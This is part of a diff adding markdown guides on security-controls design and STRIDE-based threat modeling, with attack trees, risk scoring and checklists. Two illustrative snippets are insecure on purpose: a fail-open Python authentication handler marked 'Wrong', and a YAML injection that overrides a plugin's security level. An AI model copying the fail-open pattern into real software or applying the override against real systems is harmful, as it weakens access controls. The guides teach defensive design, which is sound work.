initiates action (creates request, cannot execute) +admin_request = AdminRequest( + action="DELETE_USER", + user_id=12345, + reason="GDPR erasure request", + requested_by=admin_id +) + +# Second admin reviews and approves (cannot initiate) +reviewer.approve(admin_request, reviewer_id=different_admin_id) + +# System executes after approval (automated, no single admin control) +if admin_request.is_approved(): + execute_admin_action(admin_request) +``` + +**Principle**: **Break critical paths into multiple steps requiring different actors.** + +## Control Verification Method + +For **each control you design**, ask: **"What if this control fails?"** + +### Verification Checklist + +**For each control:** +1. **What attack does this prevent?** (threat it addresses) +2. **How can this control fail?** (failure modes) +3. **What happens if it fails?** (impact) +4. **What's the next layer of defense?** (backup control) +5. **Is failure logged/detected?** (observability) + +### Example: API Token Validation + +**Control**: Verify JWT signature before processing request + +1. **What attack**: Prevents forged tokens, ensures authenticity +2. **How it can fail**: + - Public key unavailable (service down) + - Expired token not caught (clock skew) + - Token revocation list unavailable (Redis down) + - Signature algorithm downgrade attack (accept HS256 instead of RS256) +3. **What if it fails**: + - Public key unavailable → Fail-closed (deny all requests) + - Expired token → Layer 2: Check expiration explicitly + - Revocation list down → Layer 3: Apply strict rate limits as fallback + - Algorithm downgrade → Layer 4: Explicitly require RS256, reject others +4. **Next layer**: + - Authorization checks (even with valid token, check permissions) + - Rate limiting (limit damage from compromised token) + - Audit logging (detect unusual access patterns) +5. 
**Failure logged**: Yes → Log signature validation failures, alert on spike + +**Outcome**: Designed 4 layers of defense against token attacks. + +### Example: File Upload Validation + +**Control**: Check file extension against allowlist + +1. **What attack**: Prevents upload of executable files (.exe, .sh) +2. **How it can fail**: + - Attacker renames malware.exe → malware.jpg + - Double extension: malware.jpg.exe + - Case variation: malware.ExE +3. **What if it fails**: Malicious file stored, potentially executed +4. **Next layers**: + - Layer 2: Magic byte verification (check file content, not name) + - Layer 3: Antivirus scanning (detect known malware) + - Layer 4: File reprocessing (re-encode images, destroying embedded code) + - Layer 5: noexec mount (storage prevents execution) + - Layer 6: Separate domain for user content (CSP prevents XSS) +5. **Failure logged**: Yes → Log validation failures, rejected files + +**Outcome**: Extension check is Layer 1 of 6. If bypassed, 5 more layers prevent exploitation. + +## Quick Reference: Control Selection + +**For every trust boundary, apply this checklist:** + +| Layer | Control Type | Example | +|-------|--------------|---------| +| **1. Validation** | Input checking | Size limits, type validation, sanitization | +| **2. Authentication** | Identity verification | JWT validation, certificate checks, MFA | +| **3. Authorization** | Permission checks | RBAC, resource-level access, least privilege | +| **4. Rate Limiting** | Abuse prevention | Per-user limits, anomaly detection, quotas | +| **5. Audit Logging** | Detective | Security events, tamper-proof logs, alerting | +| **6. Encryption** | Confidentiality | TLS in transit, encryption at rest, key management | + +**For each control:** +- Define fail-secure behavior (what happens if it fails?) +- Apply least privilege (minimum necessary access) +- Verify separation of duties (no single point of complete control) +- Test "what if this fails?" 
(ensure backup layers exist) + +## Common Mistakes + +### ❌ Designing Controls Before Identifying Boundaries + +**Wrong**: "I need authentication and authorization and rate limiting" + +**Right**: "Where are my trust boundaries? → Internet→API, API→Database → At each: apply layered controls" + +**Why**: Controls are meaningless without knowing WHERE to apply them. + + +### ❌ Single Layer of Defense + +**Wrong**: "Authentication is enough security" + +**Right**: "Authentication + Authorization + Rate Limiting + Audit Logging" + +**Why**: If authentication is bypassed (bug, misconfiguration), other layers provide defense. + + +### ❌ Fail-Open Defaults + +**Wrong**: +```python +try: + user = auth_service.validate(token) +except ServiceUnavailable: + user = AnonymousUser() # Let them through +``` + +**Right**: +```python +try: + user = auth_service.validate(token) +except ServiceUnavailable: + raise Unauthorized("Auth service unavailable") +``` + +**Why**: Control failure should result in secure state (deny), not insecure state (allow). + + +### ❌ Excessive Privileges + +**Wrong**: Grant web application full database access (SELECT, INSERT, UPDATE, DELETE on all tables) + +**Right**: Grant only needed operations per table (SELECT on customers, INSERT-only on audit_logs) + +**Why**: Minimizes damage from compromised application (SQL injection, stolen credentials). + + +### ❌ Single Point of Control + +**Wrong**: One admin account can initiate, approve, and execute critical operations + +**Right**: Separate accounts for initiate vs approve, require multi-signature + +**Why**: Prevents single compromised account from complete system control. + + +### ❌ No Verification of "What If This Fails?" + +**Wrong**: Design controls, assume they work + +**Right**: For each control, ask "how can this fail?" and design backup layers + +**Why**: Controls fail due to bugs, misconfigurations, attacks. Backup layers provide resilience. 
+ +## Cross-References + +**Use BEFORE this skill**: +- `ordis/security-architect/threat-modeling` - Identify threats first, then design controls to address them + +**Use WITH this skill**: +- `muna/technical-writer/documentation-structure` - Document control architecture as ADR + +**Use AFTER this skill**: +- `ordis/security-architect/security-architecture-review` - Review controls for completeness + +## Real-World Impact + +**Well-designed controls using this methodology:** +- Multi-layered API authentication catching token forgery even when signature validation was bypassed (algorithm confusion attack) +- Database access controls limiting SQL injection damage to read-only operations (least privilege prevented data deletion) +- File upload defenses stopping malware despite extension check bypass (magic bytes + antivirus + reprocessing layers) + +**Key lesson**: **Systematic application of defense-in-depth at trust boundaries is more effective than ad-hoc control selection.** diff --git a/skills/using-security-architect/threat-modeling.md b/skills/using-security-architect/threat-modeling.md new file mode 100644 index 0000000..a1bf8a3 --- /dev/null +++ b/skills/using-security-architect/threat-modeling.md @@ -0,0 +1,565 @@ + +# Threat Modeling + +## Overview + +Systematic identification of security threats using proven frameworks. Threat modeling finds threats that intuition misses by applying structured methodologies. + +**Core Principle**: Security intuition finds obvious threats. Systematic threat modeling finds subtle, critical threats that lead to real vulnerabilities. + +## When to Use + +Load this skill when: +- Designing new systems or features (before implementation) +- Adding security-sensitive functionality (auth, data handling, APIs) +- Reviewing existing designs for security gaps +- Investigating security incidents (what else could be exploited?) 
+- User mentions: "threat model", "security risks", "what could go wrong", "attack surface" + +**Use BEFORE implementation** - threats found after deployment are 10x more expensive to fix. + +## Don't Use For + +- **Implementing specific security controls** (use security-controls-design) +- **Code-level security patterns** (use secure-by-design-patterns) +- **Reviewing existing designs for completeness** (use security-architecture-review) +- **Compliance mapping** (use compliance-awareness-and-mapping) +- **Documenting threats after they're identified** (use documenting-threats-and-controls) + +This skill is for IDENTIFYING threats systematically. Once threats are identified, route to appropriate skills for designing controls, implementing patterns, or documenting decisions. + +## The STRIDE Framework + +**STRIDE** is a systematic threat enumeration framework. Apply to EVERY component, interface, and data flow. + +### S - Spoofing Identity + +**Definition**: Attacker pretends to be someone/something else + +**Questions to Ask**: +- Can attacker claim a different identity? +- Is authentication required? Can it be bypassed? +- Are credentials properly validated? +- Can tokens/sessions be stolen or forged? + +**Example Threats**: +- Stolen authentication tokens +- Forged JWT signatures +- Session hijacking via XSS +- API key leakage in logs + + +### T - Tampering with Data + +**Definition**: Unauthorized modification of data or code + +**Questions to Ask**: +- Can attacker modify data in transit? (MITM) +- Can attacker modify data at rest? (database, files, config) +- Can attacker modify code? 
(supply chain, config injection) +- **Can configuration override security properties?** (CRITICAL - often missed) + +**Example Threats**: +- Configuration files modifying security_level properties +- YAML/JSON injection overriding access controls +- Database tampering if encryption/MAC missing +- Code injection via deserialization + +**⚠️ Property Override Pattern** (VULN-004): +```yaml +# Plugin declares security_level=UNOFFICIAL in code +# Attacker adds to YAML config: +plugins: + datasource: + security_level: SECRET # OVERRIDES code declaration! +``` + +Always ask: **"Can external configuration override security-critical properties?"** + + +### R - Repudiation + +**Definition**: Attacker denies performing an action (no audit trail) + +**Questions to Ask**: +- Are security-relevant actions logged? +- Can logs be tampered with or deleted? +- Is logging sufficient for forensics? +- Can attacker perform reconnaissance without detection? + +**Example Threats**: +- No logging of failed authorization attempts +- Logs stored without integrity protection (MAC, signatures) +- Insufficient detail for incident response +- Log injection attacks + + +### I - Information Disclosure + +**Definition**: Exposure of information to unauthorized parties + +**Questions to Ask**: +- What data is exposed in responses, logs, errors? +- Can attacker enumerate resources or users? +- Are temporary files, caches, or memory properly cleared? +- Can attacker infer sensitive data from timing/behavior? + +**Example Threats**: +- Secrets in error messages or stack traces +- Timing attacks revealing password validity +- Cache poisoning exposing other users' data +- Path traversal reading arbitrary files + + +### D - Denial of Service + +**Definition**: Making system unavailable or degrading performance + +**Questions to Ask**: +- Are there resource limits (CPU, memory, connections)? +- Can attacker trigger expensive operations? +- Is rate limiting implemented? 
+- Can attacker cause crashes or hangs? + +**Example Threats**: +- Unbounded recursion or loops +- Memory exhaustion via large payloads +- Algorithmic complexity attacks (e.g., hash collisions) +- Crash via malformed input + + +### E - Elevation of Privilege + +**Definition**: Gaining capabilities beyond what's authorized + +**Questions to Ask**: +- Can attacker access admin functions? +- Can attacker escalate from low to high privilege? +- Are privilege checks performed at every layer? +- **Can type system be bypassed?** (ADR-004 pattern) + +**Example Threats**: +- Missing authorization checks on sensitive endpoints +- Horizontal privilege escalation (access other users' data) +- Vertical privilege escalation (user → admin) +- Duck typing allowing security bypass + + +## Attack Tree Construction + +**Purpose**: Visual/structured representation of attack paths from goal → exploitation + +### Attack Tree Format + +``` +ROOT: Attacker Goal (e.g., "Access classified data") +├─ BRANCH 1: Attack Vector +│ ├─ LEAF: Specific Exploit (with feasibility) +│ └─ LEAF: Alternative Exploit +├─ BRANCH 2: Alternative Vector +│ └─ LEAF: Exploit Method +``` + +### Example: Configuration Override Attack (VULN-004) + +``` +ROOT: Access classified data with insufficient clearance +├─ Override Plugin Security Level +│ ├─ Inject security_level into YAML config ⭐ (VULN-004 - actually happened) +│ ├─ Modify plugin source code (requires code access) +│ └─ Bypass registry to register malicious plugin (ADR-003 gap) +├─ Exploit Trusted Downgrade +│ ├─ Compromise high-clearance component (supply chain) +│ └─ Abuse legitimate downgrade path (ADR-005 gap) +├─ Bypass Type System +│ └─ Duck-type plugin without BasePlugin inheritance (ADR-004 gap) +``` + +**⭐ = Easiest/highest risk path** + +### How to Build Attack Trees + +1. **Start with attacker goal**: What does attacker want? (data access, DoS, privilege escalation) +2. **Branch by attack vector**: How could they achieve it? 
(config, network, code) +3. **Leaf nodes are specific exploits**: Concrete technical steps +4. **Mark feasibility**: Easy, Medium, Hard (or Low/Med/High effort) +5. **Identify easiest path**: This is your highest priority to mitigate + + +## Enforcement Gap Analysis + +**Pattern**: Security properties must be enforced at EVERY layer. Single-layer enforcement fails. + +### Layers to Check + +**For any security property (e.g., security_level, access control, data classification):** + +1. **Schema/Type Layer**: Is property type-safe? Can it be None/invalid? +2. **Registration Layer**: Is component registered? Can attacker bypass registry? +3. **Construction Layer**: Is property immutable after creation? Can it be modified? +4. **Runtime Layer**: Is property checked before sensitive operations? +5. **Post-Operation Layer**: Is result validated against expected property? + +### Example: MLS Security Level Enforcement (ADR-002 → 005) + +| Layer | Gap Found | Fix Required | +|-------|-----------|--------------| +| **Registry** | Plugin not registered at all (ADR-003) | Central plugin registry with runtime checks | +| **Type System** | Protocol allows duck typing bypass (ADR-004) | ABC with sealed methods, not Protocol | +| **Immutability** | security_level could be mutated (VULN-009) | Frozen dataclass + runtime checks | +| **Trust** | Trusted downgrade assumes no compromise (ADR-005) | Strict mode disables trusted downgrade | + +**Key Insight**: Each gap was found AFTER implementation. Systematic enforcement gap analysis would have caught all four upfront. + +### How to Apply + +For each security property: +1. **List all layers** where property matters +2. **Ask per layer**: "Can attacker bypass this layer?" +3. 
**Design defense-in-depth**: Redundant checks at multiple layers + + +## Risk Scoring + +**Purpose**: Prioritize threats by (Likelihood × Impact) + +### Likelihood Scale + +| Score | Likelihood | Criteria | +|-------|-----------|----------| +| **3** | High | Easy to exploit, attacker has means and motive, no special access needed | +| **2** | Medium | Requires some skill or access, exploit path exists but not trivial | +| **1** | Low | Requires significant expertise, insider access, or rare conditions | + +### Impact Scale + +| Score | Impact | Criteria | +|-------|--------|----------| +| **3** | High | Complete system compromise, data breach, financial loss, safety risk | +| **2** | Medium | Partial compromise, limited data exposure, service degradation | +| **1** | Low | Minor information leakage, temporary DoS, limited scope | + +### Risk Matrix + +``` + IMPACT + 1 2 3 + ┌───┬───┬───┐ + 3 │ M │ H │ C │ C = Critical (fix immediately) +L 2 │ L │ M │ H │ H = High (fix before launch) +I 1 │ L │ L │ M │ M = Medium (fix soon) +K └───┴───┴───┘ L = Low (fix if time permits) +``` + +### Example: VULN-004 Config Override + +- **Likelihood**: 3 (High) - YAML files easily modified with filesystem access +- **Impact**: 3 (High) - Bypass MLS enforcement, access classified data +- **Risk Score**: 9 (Critical) - **Fix immediately** + +### Example: ADR-004 Type System Bypass + +- **Likelihood**: 2 (Medium) - Requires knowing to create duck-typed plugin +- **Impact**: 3 (High) - Complete security bypass +- **Risk Score**: 6 (High) - **Fix before launch** + + +## Threat Modeling Workflow + +### Step 1: System Decomposition + +Break system into components: +1. **Entry points**: APIs, file uploads, configuration, user input +2. **Data stores**: Databases, caches, logs, files +3. **External dependencies**: Third-party APIs, libraries, services +4. **Trust boundaries**: Where privilege level changes, network boundaries +5. 
**Security-critical components**: Auth, access control, crypto, secrets management + + +### Step 2: Apply STRIDE per Component + +For EACH component/interface, systematically ask STRIDE questions: + +**Example: Plugin Configuration Component** + +| STRIDE | Threat Found | Priority | +|--------|-------------|----------| +| **S** | None (no identity claims) | - | +| **T** | Config tampering to override security_level (VULN-004) | Critical | +| **R** | Config changes not logged | Medium | +| **I** | Config may contain secrets in plaintext | High | +| **D** | Malformed YAML causes parser crash | Low | +| **E** | Config override elevates plugin privilege | Critical | + + +### Step 3: Build Attack Trees + +For each high-priority threat, construct attack tree: +- Goal: What does attacker want? +- Vectors: How could they get it? +- Exploits: Specific technical steps + +Mark easiest paths with ⭐. + + +### Step 4: Check Enforcement Gaps + +For each security property (authentication, authorization, encryption): +1. List enforcement layers (schema, registry, runtime, etc.) +2. Check each layer for gaps +3. Design redundant checks (defense-in-depth) + + +### Step 5: Score and Prioritize + +- Calculate Likelihood × Impact for each threat +- Sort by risk score (highest first) +- Set mitigation deadlines (Critical → immediate, High → before launch) + + +### Step 6: Document Threats + +Create threat model document: +```markdown +# Threat Model: [System Name] + +## Scope +[Components, entry points, trust boundaries] + +## Threats Identified + +### THREAT-001: Configuration Override Attack (CRITICAL) +**STRIDE**: Tampering, Elevation of Privilege +**Attack Tree**: [Include tree diagram or text description] +**Risk Score**: 9 (L:3 × I:3) +**Mitigation**: Forbid security_level in config (schema), runtime verification, frozen dataclass + +### THREAT-002: [Next threat...] 
+ +## Enforcement Gaps +[List gaps found in defense-in-depth analysis] + +## Risk Matrix +[Include prioritized threat list] +``` + + +## Common Patterns That Intuition Misses + +### Pattern 1: Property Override via Configuration + +**Symptom**: Security property declared in code, but configuration system allows overriding it + +**Example**: VULN-004 - Plugin declares security_level in code, YAML config overrides it + +**How to Spot**: +- Code declares security property (access_level, security_level, role) +- Configuration system loads external data (YAML, JSON, database) +- No explicit check that config cannot override security properties + +**Mitigation**: Schema MUST forbid security properties in config, runtime verification + + +### Pattern 2: Enforcement at One Layer Only + +**Symptom**: Security check at one layer, but attacker can bypass that layer + +**Example**: ADR-003 - MLS checks assume plugin is registered, but no check that plugin IS registered + +**How to Spot**: +- Security check at schema/type layer but not runtime +- Trust in single source of truth (registry, type system) without verification +- No redundant checks + +**Mitigation**: Defense-in-depth - check at schema, registry, runtime, post-operation + + +### Pattern 3: Type System as Security Boundary + +**Symptom**: Relying on type system (Protocol, interface) for security enforcement + +**Example**: ADR-004 - Protocol typing allows duck typing to bypass BasePlugin + +**How to Spot**: +- Security property defined in Protocol or interface +- No nominal type enforcement (isinstance check, ABC) +- Runtime doesn't verify actual type, just duck typing compatibility + +**Mitigation**: Use ABC with sealed methods, runtime isinstance checks + + +### Pattern 4: Trusted Component Assumptions + +**Symptom**: Assuming high-privilege component will never be compromised + +**Example**: ADR-005 - Trusted downgrade assumes high-clearance component is always safe + +**How to Spot**: +- Component granted special 
privileges ("trusted") +- No monitoring or verification of trusted component behavior +- Insider threat or supply chain compromise not in threat model + +**Mitigation**: Trust but verify - log all actions, anomaly detection, strict mode without trust + + +### Pattern 5: Immutability Assumption + +**Symptom**: Assuming language feature (frozen, const, final) provides security + +**Example**: VULN-009 - Frozen dataclass but `__dict__` bypass possible + +**How to Spot**: +- Security property marked frozen/immutable via language feature +- No runtime check that property hasn't changed +- Language feature has known bypasses (`__dict__`, `__setattr__`) + +**Mitigation**: Language feature + runtime verification + test all bypass methods + + +## Quick Reference Checklist + +**Use this checklist for every threat modeling session:** + +### Pre-Session +- [ ] Identify scope (components, entry points, trust boundaries) +- [ ] Gather architecture diagrams, API specs, data flow diagrams + +### STRIDE Application +- [ ] Apply S.T.R.I.D.E to EVERY component/interface +- [ ] Document threats found per category +- [ ] Check for property override patterns +- [ ] Check for enforcement gap patterns + +### Attack Trees +- [ ] Build attack tree for each high-priority threat +- [ ] Mark easiest exploitation paths +- [ ] Identify pre-requisites (what attacker needs) + +### Risk Scoring +- [ ] Score Likelihood (1-3) for each threat +- [ ] Score Impact (1-3) for each threat +- [ ] Calculate Risk = L × I +- [ ] Prioritize by risk score + +### Enforcement Gaps +- [ ] List security properties (auth, authorization, encryption, etc.) +- [ ] For each property, check: Schema? Registry? Runtime? Post-op?
+- [ ] Identify gaps in defense-in-depth + +### Documentation +- [ ] Create threat model document +- [ ] Include attack trees, risk matrix, mitigation plans +- [ ] Share with team for review + + +## Common Mistakes + +### ❌ Intuitive Threat Finding Only +**Wrong**: "I'll just think about what could go wrong" +**Right**: Systematically apply STRIDE to every component + +**Why**: Intuition finds obvious threats. STRIDE finds subtle, critical threats like VULN-004. + +### ❌ Threat Modeling After Implementation +**Wrong**: "Let's build it first, then threat model" +**Right**: Threat model BEFORE implementation + +**Why**: Threats found post-implementation require expensive re-architecture. Threats found in design are cheap to fix. + +### ❌ Single-Layer Validation +**Wrong**: "Schema validates config, so it's secure" +**Right**: Validate at schema, registry, runtime, post-operation + +**Why**: Attackers bypass single layers. Defense-in-depth catches them. + +### ❌ Trusting Language Features for Security +**Wrong**: "It's frozen=True, so it can't be modified" +**Right**: Language feature + runtime verification + test bypass methods + +**Why**: Language features have bypasses (VULN-009). Always verify. + +### ❌ Skipping Risk Scoring +**Wrong**: "All threats are important, fix them all" +**Right**: Score L×I, prioritize Critical/High, fix Low only if time permits + +**Why**: Resources are limited. Critical threats must be fixed first. 
+ + +## Real-World Examples + +### Example 1: VULN-004 - Configuration Override Attack + +**System**: Plugin system with YAML configuration and MLS security levels + +**STRIDE Analysis**: +- **T** (Tampering): Config file tampering ✓ +- **E** (Elevation): Override security_level property ✓ **← Caught by STRIDE** + +**Attack Tree**: +``` +Goal: Access classified data +└─ Override security_level to SECRET + ├─ Inject security_level: SECRET into YAML ⭐ (easiest) + ├─ Modify source code (harder) + └─ Compromise plugin registry (harder) +``` + +**Risk Score**: L:3 × I:3 = 9 (Critical) + +**Mitigation**: Forbid security_level in config schema + runtime verification + + +### Example 2: ADR-002 → 005 - MLS Design Gaps + +**System**: Multi-Level Security enforcement for plugins + +**Enforcement Gap Analysis**: +1. **Registry Layer**: No check plugin is registered (ADR-003) ✓ +2. **Type Layer**: Protocol allows duck typing (ADR-004) ✓ +3. **Immutability**: security_level could be mutated (VULN-009) ✓ +4. **Trust**: Trusted downgrade assumes no compromise (ADR-005) ✓ + +**All four gaps would have been found by systematic enforcement gap analysis at design time** - preventing 3 follow-up ADRs. + +**Risk Scores**: +- ADR-003 (registry): L:2 × I:3 = 6 (High) +- ADR-004 (type): L:2 × I:3 = 6 (High) +- ADR-005 (trust): L:1 × I:3 = 3 (Medium) + + +## When NOT to Threat Model + +**Don't threat model for**: +- Non-security features (UI styling, analytics dashboards with no sensitive data) +- Changes that don't touch attack surface (refactoring internal code, renaming variables) +- Systems with no sensitive data and no attack value (internal dev tools, prototypes) + +**Quick test**: If an attacker can't gain anything (data, money, access, disruption), threat modeling may be overkill.
+ + +## Cross-References + +### Load These Skills Together + +**For comprehensive security**: +- `ordis/security-architect/threat-modeling` (this skill) - Find threats +- `ordis/security-architect/security-controls-design` - Design mitigations +- `ordis/security-architect/secure-by-design-patterns` - Prevent threats at architecture level + +**For documentation**: +- `ordis/security-architect/documenting-threats-and-controls` - Document threat model +- `muna/technical-writer/documentation-structure` - Structure threat docs as ADRs + + +## Summary + +**Threat modeling IS systematic threat discovery using STRIDE, attack trees, and risk scoring.** + +**Key Principles**: +1. **STRIDE every component** - systematic beats intuition +2. **Build attack trees** - find easiest exploitation paths +3. **Check enforcement gaps** - defense-in-depth at every layer +4. **Score risks** - L × I prioritization +5. **Do it early** - before implementation, when fixes are cheap + +**Meta-rule**: If you're designing something security-sensitive and you haven't threat modeled it, you've missed critical threats. Always threat model first.